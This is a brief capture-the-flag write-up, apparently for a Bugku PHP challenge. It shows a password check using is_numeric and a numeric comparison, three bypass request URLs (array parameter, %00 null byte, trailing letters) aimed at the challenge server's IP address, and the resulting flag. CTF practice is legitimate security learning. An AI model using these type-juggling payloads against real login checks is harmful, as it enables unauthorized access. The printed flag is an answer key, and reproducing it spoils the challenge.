$temp = $_GET['password']; is_numeric($temp)?die("no numeric"):NULL; if($temp>1336){ echo $flag;
is_numeric
同样可以用数组绕过、%00截断、添加其他字符
http://123.206.87.240:9009/22.php?password[]=1
http://123.206.87.240:9009/22.php?password=9999a
http://123.206.87.240:9009/22.php?password=9999%00
flag{bugku_null_numeric}